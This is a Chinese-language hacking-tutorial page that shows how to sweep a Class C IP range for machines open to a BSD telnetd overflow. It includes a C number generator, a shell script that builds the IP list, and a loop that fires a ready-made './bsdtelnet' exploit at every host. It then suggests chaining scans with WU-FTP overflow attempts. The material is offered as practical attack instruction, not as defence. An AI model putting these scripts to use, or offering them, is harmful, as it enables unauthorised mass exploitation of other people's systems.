| VB 源码 | VC 源码 | ASP源码 | JSP源码 | PHP源码 | CGI源码 | FLASH源码 | 素材模板 | C 源程序 | 站长工具 | 站长教程 |

黑客技术

木马病毒
黑客技术
系统安全
防火墙
安全防范

本类阅读TOP10

·五种windows密码设置及破解
·穿过局域网的我的手 内网远程控制全攻略
·不用任何软件(木马程序)盗取账号密码
·EXE、DLL文件的脱壳
·黑客技术:SQL入侵教程
·美萍的破解方法
·Windows黑客编程基础
·硬盘还原卡的破解
·win2000密码破解不完全指南
·大话网络之经典入侵技术

站内搜索

关于扫描的技巧与实战
 一个简单的扫描一个C类IP里BSDTELNET漏洞机器例子

面我们就以一个简单的扫描一个C类IP里BSDTELNET漏洞机器为例子来看看:
$cat num.c
main()
{
int x;
for (x=0;x<256;x++)
printf ("%d\n",x);
}
上面这段C我想不用我多说了吧,他生成一个C类网的网络号,大家在编译后可以
./num >>num.txt来得到这个文本.

#!/bin/sh
echo -n "please ernter a ip:"
read ipip
list=`cat num.txt`
for listip in $list
do
echo $ipip.$listip
echo >>iplist.txt $ipip.$listip
done
上面这段我们来说说,read ipip是接受键盘的信息,用来给你输入1.1.1这样一个C
段地址以便与下面的LISTIP合并成真正的ip,list='cat num.txt'是读取我们刚才
生成的num.txt里1-254的网络号,for listip in $list是把刚才list里的num.txt
内容循环读给listip,然后我们用echo $ipip.$listip就可以得到一个真正的ip了
,再通过echo >>iplist.txt $ipip.$listip把最后得到的IP写到iplist.txt.通过
以上步骤,我们得到了一个c类ip,下面我们就来用我们事先就有的bsdtelnet溢出
代码来扫描他们了,如下:

#!/bin/sh
list=`cat iplist.txt`
for listip in $list
do
./bsdtelnet -c $listip
done

list='cat iplist.txt'读取刚才我们生成的iplist.txt文本,for listip in $list把list里存放的ip循环送给listip, 看这个./bsdtelnet -c $listip,这个
就是调用我们在当前这个SHELL所在的目录执行我们的exploit来对ip进行探测.


全部结束,好了,细心的朋友可能发现了,这样的扫描似乎很慢,呵呵,确实,因为
这样他不管23端口有没有开,不管对方机器是不是BSD的,他都要去溢出试试,在这
里,我只是通过TOMYCHEN兄提供给大家一个巧妙利用SHELL的思路,具体大家可以自
己发挥,比如先在SHELL里调用扫描器扫描,然后把开放有21端口的机器保存下面,
然后再对开了21端口的机器进行验证看是否可匿名,得到会话返回消息,如果是
WU-FTP260等,就可以再调用溢出程序进行测试呀等等.

还是那句老话,技术最重要!



相关文章
  • 在DOS下使用注册表扫描程序
  • 你行吗?汉化Win XP/2003磁盘扫描
  • 如何选择漏洞扫描工具
  • 高级扫描技术及原理介绍
  • 黑客扫描特征 以及十种最易受攻击端口
  • 手把手教你学用扫描器
  • 黑客常用兵器之扫描器篇
  • 安全防护:黑客扫描特征及十种易受攻击端口
  • 黑客扫描特征及易受攻击的端口
  • [组图]黑客常用兵器之扫描器篇
  • 相关软件

  • 扫描磁盘所有文件的例子  
  • 扫描仪支持类  
  • 扫描磁盘所有文件的例子  
  • 分别用DIR与API扫描硬盘上的所有文件  
  • 扫描磁盘所有文件的例子  
  • 一个扫描文件的模块,速度很快  
  • 扫描磁盘所有文件的例子  

  • 下载首页关于我们广告服务联系方式常见问题隐私声明法律条款本站声明下载帮助发布软件站点地图谷歌卫星地图